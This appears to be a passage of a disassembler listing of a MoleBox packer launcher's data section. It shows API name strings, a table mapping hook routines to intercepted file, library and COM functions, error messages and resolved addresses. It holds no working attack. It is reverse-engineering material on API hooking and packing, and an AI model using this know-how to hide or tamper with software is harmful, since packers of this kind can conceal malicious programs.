aGetexitcodepro db 'GetExitCodeProcess',0 ; DATA XREF: sub_412300+1A7�o
; sub_41AB84+1A6�o
align 4
aGetenvironment db 'GetEnvironmentVariableA',0 ; DATA XREF: sub_412300+193�o
aGetcurrentpr_0 db 'GetCurrentProcessId',0 ; DATA XREF: sub_412300+17F�o
; sub_41922D+11�o
aFreelibrary db 'FreeLibrary',0 ; DATA XREF: sub_412300+157�o
aFormatmessagea db 'FormatMessageA',0 ; DATA XREF: sub_412300+143�o
align 4
aFlushfilebuffe db 'FlushFileBuffers',0 ; DATA XREF: sub_412300+12F�o
align 4
aFindnextfilea db 'FindNextFileA',0 ; DATA XREF: sub_412300+11B�o
align 4
aFindfirstfilea db 'FindFirstFileA',0 ; DATA XREF: sub_412300+107�o
; sub_41AB84+11C�o
align 4
aFindclose db 'FindClose',0 ; DATA XREF: sub_412300+F3�o
; sub_41AB84+178�o
align 4
aExitprocess db 'ExitProcess',0 ; DATA XREF: sub_412300+DF�o
; sub_41AB84+202�o
aEntercriticals db 'EnterCriticalSection',0 ; DATA XREF: sub_412300+CB�o
align 4
aDeletefilea db 'DeleteFileA',0 ; DATA XREF: sub_412300+B7�o
; sub_41AB84+14A�o
aDebugbreak db 'DebugBreak',0 ; DATA XREF: sub_412300+A3�o
align 10h
aCreateprocessa db 'CreateProcessA',0 ; DATA XREF: sub_412300+8F�o
align 10h
aCreatefilema_0 db 'CreateFileMappingW',0 ; DATA XREF: sub_412300+7B�o
align 4
aCreatefilemapp db 'CreateFileMappingA',0 ; DATA XREF: sub_412300+67�o
align 4
aCreatefilew db 'CreateFileW',0 ; DATA XREF: sub_412300+53�o
aCreatefilea db 'CreateFileA',0 ; DATA XREF: sub_412300+3F�o
aClosehandle db 'CloseHandle',0 ; DATA XREF: sub_412300:loc_41232B�o
; sub_41AB84+28C�o
aApiNopefunc db ':API:NopeFunc',0 ; DATA XREF: sub_420D80+3�o
align 4
aMbx db 'mbx',0 ; DATA XREF: sub_41396C+19E�o
aBoxReadcompres db ':BOX:ReadCompressedSection: decompresion failed with code %d',0
; DATA XREF: sub_414C5A+340�o
align 10h
dword_423B60 dd 0F3h ; DATA XREF: sub_416C60+5A�w
align 8
dword_423B68 dd 2 dup(0) ; DATA XREF: sub_414C5A+B6�o
; sub_414C5A+DB�o ...
dword_423B70 dd 0 ; DATA XREF: sub_414C5A+73�r
; sub_414C5A+F9�w ...
dword_423B74 dd 0 ; DATA XREF: sub_414C5A+63�r
; sub_414C5A+106�w ...
off_423B78 dd offset dword_42487C ; DATA XREF: sub_414C5A+84�r
; sub_414C5A+125�r
dd 5 dup(0)
dd offset dword_424880
dd 5 dup(0)
dd offset dword_424884
align 10h
dword_423BB0 dd 584F424Dh ; DATA XREF: _3:loc_4175AF�r
; _3:004175D3�o
align 8
dword_423BB8 dd 2Ah ; DATA XREF: sub_41006B+5A�o
dword_423BBC dd 2A2E2Ah ; DATA XREF: sub_41006B+26�o
dword_423BC0 dd 71AA4000h ; DATA XREF: sub_4184A0:loc_4185A7�r
; sub_4184A0+112�w ...
aExecutable db 'EXECUTABLE',0 ; DATA XREF: sub_4184A0+125�o
; sub_418780+130�o
align 10h
aTheDynamicLink db 'The dynamic link library ',27h,'%s',27h,' could not be found',0
; DATA XREF: sub_4184A0+FD�o
align 4
aOleaout32_dll db 'oleaout32.dll',0 ; DATA XREF: sub_418780+1A5�o
align 4
aOleoaut32_dll db 'oleoaut32.dll',0 ; DATA XREF: sub_418780:loc_418911�o
align 4
aImm32_dll db 'imm32.dll',0 ; DATA XREF: sub_418780:loc_4188EF�o
; sub_418780+183�o
align 10h
aTheUncompressi db 'The uncompression error',0
; ---------------------------------------------------------------------------
loc_423C48: ; DATA XREF: sub_419995+A9A�o
pop eax
push 0FF00FF00h
push 0FF00FF00h
push 0FF00FF00h
push eax
push 0FF00FF00h
retn
; ---------------------------------------------------------------------------
align 10h
dword_423C60 dd 6C6C642Eh, 0 ; DATA XREF: sub_4191AB+19�o
; sub_4191AB+32�o
aCProjectsPTegg db 'C:\Projects\P\Teggo\MoleBox\molebox2\bootup\mbx_DLL.cpp',0
; DATA XREF: sub_419995+C67�o
a_box_ db '_BOX_',0 ; DATA XREF: sub_419995+A0E�o
align 4
aGetcurrentdire db 'GetCurrentDirectoryA',0 ; DATA XREF: sub_41AB84+EE�o
align 10h
aSetcurrentdire db 'SetCurrentDirectoryA',0 ; DATA XREF: sub_41AB84+C0�o
align 4
aMbx@X@_ db 'MBX@%X@*.###',0 ; DATA XREF: sub_41AB84+53�o
; sub_41BF82+E8�o
align 4
aStripped db '<stripped>',0 ; DATA XREF: _4:off_4214F4�o
align 4
aAssertionFai_0 db 'ASSERTION failed',0 ; DATA XREF: _4:off_4214F0�o
align 4
aMoleboxLaunche db 'MoleBox launcher fatal error',0 ; DATA XREF: _4:off_4214EC�o
align 4
asc_423D28: ; DATA XREF: sub_41BB7C+57�o
; sub_41BBE7+2D�o
dw 0Ah
unicode 0, <>,0
aErrorAtSDReaso db 'Error at %s:%d',0Ah ; DATA XREF: sub_41BB7C+1E�o
db 0Ah
db 'Reason: ',0
align 4
aUp1_txt db '-up1.txt',0 ; DATA XREF: sub_41BC28:loc_41BD38�o
align 4
aUp_txt db '-up.txt',0 ; DATA XREF: sub_41BC28+BC�o
asc_423D5C db 0Dh,0Ah,0 ; DATA XREF: sub_41BE16+59�o
align 10h
aWindowsErrorSA db 'windows error %s',0Ah ; DATA XREF: sub_41BEBA+75�o
db ' at %s(%d)',0Ah,0
align 10h
aMbx@X@X_ db 'MBX@%X@%X.###',0 ; DATA XREF: sub_41BF82+C2�o
align 10h
aMbx@X@X@X_ db 'MBX@%X@%X@%X.###',0 ; DATA XREF: sub_41BF82+93�o
align 4
a_ db '.###',0 ; DATA XREF: sub_41C106+175�o
align 4
aMbx@ db 'MBX@',0 ; DATA XREF: sub_41C106+78�o
align 4
aInvalidDllRelo db 'INVALID DLL RELOCATION',0 ; DATA XREF: sub_41C317:loc_41C550�o
align 4
aBadFuulname db 'BAD FUULNAME',0 ; DATA XREF: sub_41C317:loc_41C547�o
align 4
aGetmodulenameE db 'GetModuleName ERROR',0 ; DATA XREF: sub_41C317:loc_41C53E�o
aHookingDllErro db 'HOOKING DLL ERROR',0 ; DATA XREF: sub_41C317:loc_41C535�o
align 4
aPackedDllOrBox db 'PACKED DLL OR BOXFILE CORRUPTED',0 ; DATA XREF: sub_41C317:loc_41C52C�o
aInvalidCompres db 'INVALID COMPRESSION/ENCRYPTION ALGORITHM',0
; DATA XREF: sub_41C317:loc_41C523�o
align 10h
aDllCorrupted db 'DLL CORRUPTED',0 ; DATA XREF: sub_41C317:loc_41C51A�o
align 10h
aHeapCorrupted db 'HEAP CORRUPTED',0 ; DATA XREF: sub_41C317:loc_41C511�o
align 10h
aCouldNotCreate db 'COULD NOT CREATE HEAP',0 ; DATA XREF: sub_41C317:loc_41C508�o
align 4
aVirtualprote_0 db 'VIRTUALPROTECT BROKEN',0 ; DATA XREF: sub_41C317:loc_41C4FF�o
align 10h
aWrappersTableB db 'WRAPPERS TABLE BROKEN',0 ; DATA XREF: sub_41C317:loc_41C4F6�o
align 4
aOutOfMemory db 'OUT OF MEMORY',0 ; DATA XREF: sub_41C317:loc_41C4ED�o
align 4
aFeatureIsNotIm db 'FEATURE IS NOT IMPLEMENTED',0 ; DATA XREF: sub_41C317:loc_41C4E4�o
align 4
aBoxfileCorrupt db 'BOXFILE CORRUPTED',0 ; DATA XREF: sub_41C317:loc_41C4DB�o
align 4
aReadBoxfileErr db 'READ BOXFILE ERROR',0 ; DATA XREF: sub_41C317:loc_41C4D2�o
align 4
aCouldNotOpenBo db 'COULD NOT OPEN BOXFILE',0 ; DATA XREF: sub_41C317:loc_41C4C6�o
align 4
aPathIsVeryLong db 'PATH IS VERY LONG',0 ; DATA XREF: sub_41C317:loc_41C4BA�o
align 4
aExecutableCorr db 'EXECUTABLE CORRUPTED',0 ; DATA XREF: sub_41C317:loc_41C4AE�o
align 10h
aDynamicLibrary db 'DYNAMIC LIBRARY IS NOT NT IMAGE',0 ; DATA XREF: sub_41C317:loc_41C4A2�o
aExecutableIsNo db 'EXECUTABLE IS NOT NT IMAGE',0 ; DATA XREF: sub_41C317:loc_41C496�o
align 4
aHasNoAccessToE db 'HAS NO ACCESS TO EXECUTABLE',0 ; DATA XREF: sub_41C317:loc_41C48A�o
aAssertionFaile db 'ASSERTION FAILED',0 ; DATA XREF: sub_41C317:loc_41C47E�o
align 4
aEsi0x08xEdi0x0 db 'ESI:0x%08X EDI:0x%08X',0 ; DATA XREF: sub_41C317+101�o
align 4
aEsp0x08xEbp0x0 db 'ESP:0x%08X EBP:0x%08X EIP:0x%08X',0 ; DATA XREF: sub_41C317+DC�o
align 4
aEax0x08xEdx0x0 db 'EAX:0x%08X EDX:0x%08X ECX:0x%08X',0 ; DATA XREF: sub_41C317+AB�o
align 4
aEs0x08xFs0x08x db 'ES :0x%08X FS :0x%08X GS :0x%08X',0 ; DATA XREF: sub_41C317+7A�o
align 10h
aCs0x08xSs0x08x db 'CS :0x%08X SS :0x%08X DS :0x%08X',0 ; DATA XREF: sub_41C317+49�o
align 4
a__seh__0xXAt0x db '__SEH__ 0x%x at 0x%x',0 ; DATA XREF: sub_41C317+18�o
align 4
aCc7574e45e3947 db '{CC7574E4-5E39-4700-B286-269A82DD8E95}',0 ; DATA XREF: sub_410253+40�o
; sub_410253+A8�o
align 4
a_splashscreen_ db '_splashscreen.bmp',0 ; DATA XREF: sub_410386+12�o
align 4
aBroken0x08x db '!broken!0x%08x:',0 ; DATA XREF: sub_41C5E3+FB�o
a0x08xS03x08x db '0x%08x:[%s]:(%03x:%08x)',0 ; DATA XREF: sub_41C5E3+CA�o
aUnknown db 'unknown',0 ; DATA XREF: sub_41C5E3+B7�o
a0x08xUnknownUn db '0x%08x:[unknown]:unknown',0 ; DATA XREF: sub_41C5E3+60�o
align 4
aBroken db '!broken!',0 ; DATA XREF: sub_41C5E3+31�o
align 10h
a0x08x0x08x0x08 db '0x%08x: 0x%08x 0x%08x 0x%08x 0x%08x',0 ; DATA XREF: sub_41C87E+F9�o
aStack db '--stack--',0 ; DATA XREF: sub_41C87E:loc_41C932�o
align 10h
a___OpssBrokenB db ' ... opss, broken by SEH',0 ; DATA XREF: sub_41C87E+A5�o
; sub_41C87E+11E�o
align 4
aS db ' %s',0 ; DATA XREF: sub_41C87E+47�o
; sub_41C87E+8A�o
align 4
aBacktrace db '-- backtrace --',0 ; DATA XREF: sub_41C87E+28�o
align 8
dd 2 dup(0FFFFFFFFh)
aDllgetclassobj db 'DllGetClassObject',0 ; DATA XREF: sub_41CA0F+51�o
; sub_41E33E+3E�o
align 8
dword_424198 dd 2 dup(0) ; DATA XREF: sub_41CAA3+43�o
dd 0C0h, 46000000h
dword_4241A8 dd 1, 0 ; DATA XREF: sub_41CAA3+11�o
dd 0C0h, 46000000h
aRegqueryvaluea db 'RegQueryValueA',0 ; DATA XREF: sub_41CD16+42�o
align 4
aAdvapi32_dll db 'ADVAPI32.DLL',0 ; DATA XREF: sub_41CD16+3D�o
align 4
aClsid08x04x04x db 'CLSID\{%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}\InprocSe'
; DATA XREF: sub_41CDFA+58�o
db 'rver32',0
off_424220 dd offset sub_41D332 ; DATA XREF: sub_41D40A+102�o
dd offset aSetunhandled_0 ; "SetUnhandledExceptionFilter"
dd offset sub_41E58B
dd offset aCreatefilea_0 ; "CreateFileA"
dd offset sub_41E5D9
dd offset aCreatefilew_0 ; "CreateFileW"
dd offset sub_41DDE5
dd offset aGetfileattri_1 ; "GetFileAttributesA"
dd offset sub_41DE13
dd offset aGetfileattri_2 ; "GetFileAttributesW"
dd offset sub_41E6D7
dd offset aReadfile_0 ; "ReadFile"
dd offset sub_41E6B0
dd offset aClosehandle_0 ; "CloseHandle"
dd offset sub_41E73B
dd offset aSetfilepoint_0 ; "SetFilePointer"
dd offset sub_41DEE0
dd offset aGetfilesize_0 ; "GetFileSize"
dd offset sub_41D6FE
dd offset aExitprocess_0 ; "ExitProcess"
dd offset sub_41E77F
dd offset aCreatefilema_1 ; "CreateFileMappingA"
dd offset sub_41E7BB
dd offset aCreatefilema_2 ; "CreateFileMappingW"
dd offset sub_41E7F7
dd offset aMapviewoffil_0 ; "MapViewOfFile"
dd offset sub_41E836
dd offset aUnmapviewoff_0 ; "UnmapViewOfFile"
dd offset sub_41E45A
dd offset aFreelibrary_0 ; "FreeLibrary"
dd offset sub_41E15D
dd offset aLoadlibrarya_0 ; "LoadLibraryA"
dd offset sub_41E22D
dd offset aLoadlibraryw ; "LoadLibraryW"
dd offset sub_41E170
dd offset aLoadlibrarye_0 ; "LoadLibraryExA"
dd offset sub_41E240
dd offset aLoadlibraryexw ; "LoadLibraryExW"
dd offset sub_41E33E
dd offset aGetprocaddre_0 ; "GetProcAddress"
dd offset sub_41D96A
dd offset aFindfirstfil_0 ; "FindFirstFileA"
dd offset sub_41D997
dd offset aFindfirstfilew ; "FindFirstFileW"
dd offset sub_41DAE0
dd offset aFindfirstfilee ; "FindFirstFileExW"
dd offset sub_41DC35
dd offset aFindclose_0 ; "FindClose"
dd offset sub_41DC5C
dd offset aFindnextfile_0 ; "FindNextFileA"
dd offset sub_41DC8D
dd offset aFindnextfilew ; "FindNextFileW"
dd offset sub_41E85D
dd offset aOpenfile ; "OpenFile"
dd offset sub_41E911
dd offset a_lopen ; "_lopen"
dd offset sub_41E952
dd offset a_lclose ; "_lclose"
dd offset sub_41E9EC
dd offset a_lread ; "_lread"
dd offset sub_41E9A7
dd offset a_llseek ; "_llseek"
dd offset sub_41E254
dd offset aGetmodulehan_0 ; "GetModuleHandleA"
dd offset sub_41E28E
dd offset aGetmodulehan_1 ; "GetModuleHandleW"
dd offset sub_41D85C
dd offset aSearchpathw ; "SearchPathW"
dd offset sub_41D7FD
dd offset aSearchpatha ; "SearchPathA"
dd offset sub_41DF52
dd offset aGetprivatepr_2 ; "GetPrivateProfileStringA"
dd offset sub_41DFF8
dd offset aGetprivatepr_3 ; "GetPrivateProfileIntA"
dd offset sub_41E07F
dd offset aGetprivatepr_4 ; "GetPrivateProfileSectionNamesA"
; ---------------------------------------------------------------------------
retf 41E0h
; ---------------------------------------------------------------------------
align 4
dd offset aGetprivatepr_5 ; "GetPrivateProfileSectionA"
dd offset sub_41DD46
dd offset aGetfileinfor_0 ; "GetFileInformationByHandle"
dd offset sub_41DD77
dd offset aLockfile_0 ; "LockFile"
dd offset sub_41DDB3
dd offset aUnlockfile_0 ; "UnlockFile"
dd offset sub_41DF18
dd offset aGetmodulefil_0 ; "GetModuleFileNameA"
off_424378 dd offset sub_41E519 ; DATA XREF: sub_41D40A+116�o
dd offset aAddfontresou_0 ; "AddFontResourceA"
dd offset sub_41E552
dd offset aRemovefontre_0 ; "RemoveFontResourceA"
off_424388 dd offset sub_41E4C5 ; DATA XREF: sub_41D40A+12A�o
dd offset aLoadimagea_0 ; "LoadImageA"
off_424390 dd offset sub_41CBF6 ; DATA XREF: sub_41D40A+13E�o
dd offset aCocreateinstan ; "CoCreateInstance"
dd offset sub_41CE67
dd offset aCocreateinst_0 ; "CoCreateInstanceEx"
dd offset sub_41CF9E
dd offset aCogetclassobje ; "CoGetClassObject"
off_4243A8 dd offset sub_41D112 ; DATA XREF: sub_41D40A+152�o
dd offset aGetrecordinf_0 ; "GetRecordInfoFromGuids"
dd offset sub_41D21A
dd offset aLoadregtypelib ; "LoadRegTypeLib"
dword_4243B8 dd 19930520h, 414827h, 0B0h, 12DA44h, 2 dup(0) ; DATA XREF: _3:004104B7�o
; sub_4104BE+2�o
off_4243D0 dd offset word_4243DA ; DATA XREF: sub_41072E:loc_41077D�r
; sub_41072E:loc_41078F�r ...
dd offset word_4243DA
db 2 dup(0)
word_4243DA dw 20h ; DATA XREF: _5:off_4243D0�o
; _5:004243D4�o
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_4245DC dd 1 ; DATA XREF: sub_41072E+3C�r
; sub_41097A:loc_410982�r ...
dd 2Eh, 1, 2 dup(0)
dword_4245F0 dd 77E64C09h ; DATA XREF: sub_411310+1DF�w
; sub_411310+1F6�r ...
dword_4245F4 dd 860000h ; DATA XREF: _3:00411EF3�w _3:00411F2F�r
dword_4245F8 dd 880000h ; DATA XREF: _3:00411F2A�w _3:00411F3B�r
dword_4245FC dd 870000h ; DATA XREF: _3:00411F14�w
dword_424600 dd 2 ; DATA XREF: _3:004120DC�r
; sub_418B90+BA�r ...
dword_424604 dd 851F00h ; DATA XREF: _3:00412226�r
; _3:loc_4122AF�r ...
dword_424608 dd 411B5Eh ; DATA XREF: sub_411E70+3�r
; _3:00411E8F�w
dword_42460C dd 0FFFFFFFFh ; DATA XREF: sub_411310+213�w
; sub_411310+387�r ...
dd 0
byte_424614 db 0 ; DATA XREF: _3:004122C1�w
; sub_4191AB+E�r
align 4
dword_424618 dd 6 ; DATA XREF: sub_411310+3F9�w
; sub_418780:loc_4187CD�r
off_42461C dd offset aKbyr ; DATA XREF: sub_411310+402�w
; _3:loc_412CB7�r ...
; "KByR"
dword_424620 dd 0 ; DATA XREF: sub_412300+8B3�o
dword_424624 dd 77E77963h ; DATA XREF: sub_412300+3A�w
; sub_412300+881�o ...
dword_424628 dd 77E7A837h ; DATA XREF: sub_412300+4E�w
; _3:00412C2C�r ...
dword_42462C dd 77E779B1h ; DATA XREF: sub_412300+62�w
; sub_41E5D9+9F�r
dword_424630 dd 77E77797h ; DATA XREF: sub_412300+76�w
; _3:00412C60�r ...
dword_424634 dd 77E776D3h ; DATA XREF: sub_412300+8A�w
; sub_41E7BB+2C�r
dword_424638 dd 77E61BB8h ; DATA XREF: sub_412300+9E�w
; sub_41A8B3+E6�r
dword_42463C dd 77EB36A5h ; DATA XREF: sub_412300+B2�w
dword_424640 dd 77E73628h ; DATA XREF: sub_412300+C6�w
; sub_41396C+2EA�r ...
dword_424644 dd 77F7E21Fh ; DATA XREF: sub_412300+DA�w
; sub_413272+2A�r ...
dword_424648 dd 77E75CB5h ; DATA XREF: sub_412300+EE�w
; sub_41D6FE+AF�r
dword_42464C dd 77E78EAAh ; DATA XREF: sub_412300+102�w
; sub_416C60+4FE�r ...
dword_424650 dd 77E75D9Eh ; DATA XREF: sub_412300+116�w
; sub_4136FE+B4�r ...
dword_424654 dd 77E75E67h ; DATA XREF: sub_412300+12A�w
; sub_4136FE+DC�r ...
dword_424658 dd 77E73FF9h ; DATA XREF: sub_412300+13E�w
; sub_419995+C31�r
dword_42465C dd 77E76A60h ; DATA XREF: sub_412300+152�w
; sub_41BEBA+60�r
dword_424660 dd 77E80618h ; DATA XREF: sub_412300+166�w
; sub_41925C+128�r ...
dword_424664 dd 77E79C90h ; DATA XREF: sub_412300+17A�w
; sub_41A8B3+4B�r ...
dword_424668 dd 77E80656h ; DATA XREF: sub_410216+15�r
; sub_412300+18E�w ...
dword_42466C dd 77E7AC5Eh ; DATA XREF: sub_412300+1A2�w
dword_424670 dd 77E7FF65h ; DATA XREF: sub_412300+1B6�w
dword_424674 dd 77E74CABh ; DATA XREF: sub_412300+1CA�w
; sub_41DDE5+16�r
dword_424678 dd 77E78536h ; DATA XREF: sub_412300+1DE�w
; sub_41DE13+84�r
dword_42467C dd 77E72EA0h ; DATA XREF: sub_412300+1F2�w
; sub_414856+83�r ...
dword_424680 dd 77E793EFh ; DATA XREF: sub_412300+206�w
; _3:00412C41�r ...
dword_424684 dd 77E73CE2h ; DATA XREF: sub_412300+21A�w
; _3:0041792F�r
dword_424688 dd 77E80357h ; DATA XREF: sub_412300+22E�w
; sub_413272+71�r ...
dword_42468C dd 77E781DBh ; DATA XREF: sub_412300+242�w
; sub_41D85C+92�r
dword_424690 dd 77F5157Dh ; DATA XREF: sub_412300+256�w
; sub_41925C+113�r ...
dword_424694 dd 77E7A099h ; DATA XREF: sub_412300+26A�w
; _3:00412EB9�r ...
dword_424698 dd 77E79F93h ; DATA XREF: sub_410253+4C�r
; _3:00411E99�r ...
dword_42469C dd 77E719F3h ; DATA XREF: sub_412300+292�w
; sub_41DFF8+76�r
dword_4246A0 dd 77E61FD2h ; DATA XREF: sub_412300+2A6�w
; sub_41E07F+3B�r
dword_4246A4 dd 77E72C64h ; DATA XREF: sub_412300+2BA�w
; sub_41DF52+95�r
dword_4246A8 dd 77E7A5FDh ; DATA XREF: _3:00411EC2�r
; sub_412300+2CE�w ...
dword_4246AC dd 77E6167Bh ; DATA XREF: sub_412300+2E2�w
; sub_414C5A+97�r ...
dword_4246B0 dd 77E6AF8Fh ; DATA XREF: sub_412300+2F6�w
; sub_41396C+1A6�r
dword_4246B4 dd 77E6AD34h ; DATA XREF: sub_412300+30A�w
; sub_41396C+193�r ...
dword_4246B8 dd 77E7C657h ; DATA XREF: sub_412300+31E�w
dword_4246BC dd 77E7751Ah ; DATA XREF: _3:00411EFF�r
; sub_412300+332�w
dword_4246C0 dd 77F516F8h ; DATA XREF: sub_412300+346�w
; sub_41BA4A+1F�r
dword_4246C4 dd 77F51597h ; DATA XREF: sub_412300+35A�w
; sub_41BACD+1C�r
dword_4246C8 dd 77E7C726h ; DATA XREF: sub_412300+36E�w
; sub_41BA87+16�r
dword_4246CC dd 77E79908h ; DATA XREF: sub_412300+382�w
; sub_416C60+2E�r ...
dword_4246D0 dd 77F53275h ; DATA XREF: sub_412300+396�w
; sub_41EB05+2B�r
dword_4246D4 dd 77F7E300h ; DATA XREF: sub_412300+3AA�w
; sub_41363F+5�r ...
dword_4246D8 dd 77E805B8h ; DATA XREF: sub_412300+3D2�w
; sub_419995+16A�r
dword_4246DC dd 77E805D8h ; DATA XREF: sub_412300+3BE�w
; sub_412300+5D0�r ...
dword_4246E0 dd 77E79881h ; DATA XREF: sub_412300+3E6�w
dword_4246E4 dd 77E79A45h ; DATA XREF: sub_412300+3FA�w
; sub_41BF54+9�r
dword_4246E8 dd 77E64E2Bh ; DATA XREF: sub_412300+40E�w
; sub_41DD77+23�r
dword_4246EC dd 77E74D76h ; DATA XREF: sub_412300+422�w
; _3:00412C7D�r ...
dword_4246F0 dd 77E77CCEh ; DATA XREF: sub_412300+436�w
; sub_41D112+69�r ...
dword_4246F4 dd 77E706B7h ; DATA XREF: sub_412300+44A�w
dword_4246F8 dd 77E6D706h ; DATA XREF: _3:00411EB3�r _3:00411EDC�r ...
dword_4246FC dd 77E78B82h ; DATA XREF: sub_412300+472�w
; _3:00414B09�r ...
dword_424700 dd 77E6BD68h ; DATA XREF: sub_412300+486�w
dword_424704 dd 77E74A3Bh ; DATA XREF: sub_412300+49A�w
; sub_41E6D7+57�r
dword_424708 dd 77E78C81h ; DATA XREF: sub_412300+4AE�w
; sub_414344+74�r ...
dword_42470C dd 77F51587h ; DATA XREF: sub_412300+4C2�w
; sub_413272+3BC�r ...
dword_424710 dd 77E7C9E7h ; DATA XREF: sub_412300+4D6�w
; sub_41C307+8�r ...
dword_424714 dd 77E61BE6h ; DATA XREF: sub_410253+100�r
; sub_410386+4D�r ...
dword_424718 dd 77E616B4h ; DATA XREF: sub_412300+4FE�w
; sub_41BAF1+2D�r ...
dword_42471C dd 77E64EA0h ; DATA XREF: sub_412300+512�w
; sub_41DDB3+23�r
dword_424720 dd 77E75090h ; DATA XREF: sub_412300+526�w
; sub_41E836+17�r
dword_424724 dd 77E7980Ah ; DATA XREF: sub_412300+53A�w
; sub_413FDF+124�r ...
dword_424728 dd 77E79E34h ; DATA XREF: sub_412300+54E�w
; sub_413EED+91�r ...
dword_42472C dd 77E6169Ah ; DATA XREF: sub_412300+562�w
; sub_413FDF+1A7�r ...
dword_424730 dd 77E7F044h ; DATA XREF: sub_412300+576�w
; sub_41C5E3+56�r
dword_424734 dd 77E79D5Bh ; DATA XREF: sub_412300+58A�w
dword_424738 dd 77E79924h ; DATA XREF: sub_412300+59E�w
; sub_41D85C+6A�r ...
dword_42473C dd 77E79D8Ch ; DATA XREF: sub_412300+5B2�w
; sub_41396C+282�r ...
dword_424740 dd 77E76A2Eh ; DATA XREF: sub_412300+5C6�w
; sub_415B59+1E2�r ...
dword_424744 dd 77D98E9Ah ; DATA XREF: sub_412300+5FF�w
; sub_41BAF1+B�r ...
dword_424748 dd 77D44D9Bh ; DATA XREF: sub_412300+613�w
; sub_413272+88�r ...
dword_42474C dd 77D4D42Bh ; DATA XREF: sub_412300+627�w
; sub_41E4C5+44�r
dword_424750 dd 77D6ADD7h ; DATA XREF: sub_412300+63B�w
; sub_41BAF1+1E�r ...
dword_424754 dd 77D4C96Ah ; DATA XREF: sub_412300+64F�w
; sub_41AB84+5D�r ...
dword_424758 dd 77D4C783h ; DATA XREF: sub_412300+663�w
; sub_41BB7C+45�r ...
dword_42475C dd 77C87425h ; DATA XREF: sub_412300+69C�w
; sub_41396C+2D4�r
dword_424760 dd 77C7212Fh ; DATA XREF: sub_41015E+41�r
; sub_412300+6B0�w ...
dword_424764 dd 77C76551h ; DATA XREF: sub_412300+6C4�w
; sub_418F16+1D1�r
dword_424768 dd 77C72C6Bh ; DATA XREF: sub_41015E+8A�r
; sub_412300+6D8�w ...
dword_42476C dd 77C87887h ; DATA XREF: sub_412300+6EC�w
; sub_413D44+E6�r ...
dword_424770 dd 77D458EEh ; DATA XREF: sub_41015E+38�r
; sub_412300+700�w
dword_424774 dd 77D458FDh ; DATA XREF: sub_41015E+97�r
; sub_412300+714�w
dword_424778 dd 77C7506Dh ; DATA XREF: sub_41015E+2B�r
; sub_410253+26�r ...
dword_42477C dd 77C71BB0h ; DATA XREF: sub_41015E+53�r
; sub_41015E+81�r ...
dword_424780 dd 77C72889h ; DATA XREF: sub_410253+119�r
; sub_412300+750�w
dword_424784 dd 77C729E2h ; DATA XREF: sub_41015E+75�r
; sub_412300+764�w
dword_424788 dd 77D45CBCh ; DATA XREF: sub_410216+F�r
; sub_412300+778�w
dword_42478C dd 77D48977h ; DATA XREF: sub_410216+23�r
; sub_412300+78C�w
dword_424790 dd 77D47F34h ; DATA XREF: sub_410216+2C�r
; sub_412300+7A0�w
dword_424794 dd 77D4DCCCh ; DATA XREF: sub_410253+5C�r
; sub_412300+7B4�w
dword_424798 dd 77D477C0h ; DATA XREF: sub_410253+64�r
; sub_410253+6F�r ...
dword_42479C dd 77D414D4h ; DATA XREF: sub_410253+AF�r
; sub_412300+7DC�w
dword_4247A0 dd 77D44200h ; DATA XREF: sub_410253+CB�r
; sub_412300+7F0�w
dword_4247A4 dd 77D43DD3h ; DATA XREF: sub_410253+E9�r
; sub_412300+804�w
dword_4247A8 dd 77D441F2h ; DATA XREF: sub_410253+F3�r
; sub_412300+818�w
dword_4247AC dd 77D49A11h ; DATA XREF: sub_410253+109�r
; sub_412300+82C�w
dword_4247B0 dd 77D47627h ; DATA XREF: sub_410253+126�r
; sub_412300+840�w
dword_4247B4 dd 77D46F5Bh ; DATA XREF: sub_412300+854�w
dword_4247B8 dd 77D442CFh ; DATA XREF: _3:004122E7�r
; sub_412300+868�w
dword_4247BC dd 77E7AC37h ; DATA XREF: sub_410386+45�r
; sub_412300+87C�w
dword_4247C0 dd 0 ; DATA XREF: sub_412300+888�o
byte_4247C4 db 0 ; DATA XREF: sub_413186+69�o
; sub_413186+7F�w ...
align 4
dd 20h dup(0)
dword_424848 dd 77FC5920h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_413272+25�o
; sub_41363F�o ...
dword_424860 dd 8D0538h ; DATA XREF: sub_413EED+25�r
; sub_413EED+5D�r ...
dword_424864 dd 8D00A8h ; DATA XREF: sub_413056+50�r
; sub_413056+8E�r ...
dword_424868 dd 8D02F0h ; DATA XREF: sub_41396C:loc_413A3E�r
; sub_41396C+10B�r ...
dword_42486C dd 8D0780h ; DATA XREF: sub_41365E+7E�r
; sub_4136FE+25�r ...
dword_424870 dd 0 ; DATA XREF: sub_416BE0+8�r
; sub_416BE0+19�r
dword_424874 dd 0 ; DATA XREF: sub_416BE0+10�r
dword_424878 dd 890048h ; DATA XREF: _3:00414A26�r _3:00414AFD�r ...
dword_42487C dd 8A0090h ; DATA XREF: sub_416C60+57C�w
; _5:off_423B78�o
dword_424880 dd 8B0098h ; DATA XREF: sub_416C60+59A�w
; _5:00423B90�o
dword_424884 dd 8C00A0h ; DATA XREF: sub_416C60+5B9�w
; _5:00423BA8�o
dword_424888 dd 8520F8h ; DATA XREF: sub_413272+34�r
; sub_413272+5E�r ...
dword_42488C dd 852320h ; DATA XREF: sub_416C60+144�w
; sub_416C60+151�r ...
dword_424890 dd 4000F0h ; DATA XREF: _3:0041747F�w _3:00417485�r ...
dword_424894 dd 0 ; DATA XREF: sub_418730+4�r
; sub_418730+C�w ...
dword_424898 dd 0 ; DATA XREF: sub_410253+A3�o
; sub_41DFF8+37�o
dword_42489C dd 0 ; DATA XREF: sub_41AA23+11�r
; sub_41AB84+22�w ...
dd 0
dword_4248A4 dd 0 ; DATA XREF: sub_419529+359�w
; sub_419529+377�w ...
dword_4248A8 dd 0 ; DATA XREF: sub_41AA23+24�w
; sub_41AA23+29�r ...
dword_4248AC dd 8D0C70h ; DATA XREF: sub_419529+23B�r
; sub_419529+26B�r ...
dword_4248B0 dd 8D0D30h ; DATA XREF: sub_41D40A+F6�w
dword_4248B4 dd 8D0CD0h ; DATA XREF: sub_41925C+1A�r
; sub_419529+19E�r ...
dword_4248B8 dd 0 ; DATA XREF: sub_419995+C40�w
; sub_41A8B3+5F�r
